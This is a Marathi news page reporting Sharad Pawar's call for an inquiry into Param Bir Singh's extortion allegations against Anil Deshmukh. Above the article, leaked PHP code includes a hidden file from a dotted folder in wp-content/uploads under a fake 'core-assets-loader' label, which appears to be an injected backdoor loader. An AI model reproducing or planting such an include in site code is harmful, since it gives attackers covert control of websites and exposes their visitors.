add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); परमबीर सिंह यांच्या पत्रावर शरद पवार यांची मोठी प्रतिक्रीया – SOCH INDIA
Menu

देश
परमबीर सिंह यांच्या पत्रावर शरद पवार यांची मोठी प्रतिक्रीया

nobanner

मुंबईचे माजी पोलीस आयुक्त परमबीर सिंह यांच्या पत्रामुळे राज्यातील राजकारणात खळबळ उडाली आहे. त्यांनी गृहमंत्री अनिल देशमुख यांच्यावर दरमहा 100 कोटी रुपये वसुलीचे गंभीर आरोप केले आहेत. त्यांमुळे विरोधकांकडून अनिल देशमुखांच्या राजीनाम्याची मागणी होत आहे. याप्रकरणाची चौकशी करण्याची मागणी राष्ट्रवादीचे अध्यक्ष शरद पवार यांनी केली आहे.

या प्रकरणाचे गांभीर्य लक्षात घेता, राष्ट्रवादी कॉंग्रेस पक्षाचे अध्यक्ष शरद पवार यांनी आज दिल्लीत पत्रकार परिषद घेतली. उद्योजक मुकेश अंबानी  यांच्या बंगल्यासमोर स्फोटकांची गाडी ठेवल्याचे प्रकरण, सचिन वाझे यांची अटक आणि मनसुख हिरेन हत्याप्रकरणाची माहिती पवार यांनी यावेळी दिली.

परमबीर सिंह यांच्या पत्रावर त्यांची सही नाही. परमबीर सिंह यांचे आरोप त्यांची बदलीनंतर करण्यात आले आहेत. या आरोपांचे गांभीर्य लक्षात घेता. याप्रकरणाची कसून चौकशी व्हायला हवी. असे पवार यांनी स्पष्ट केले आहे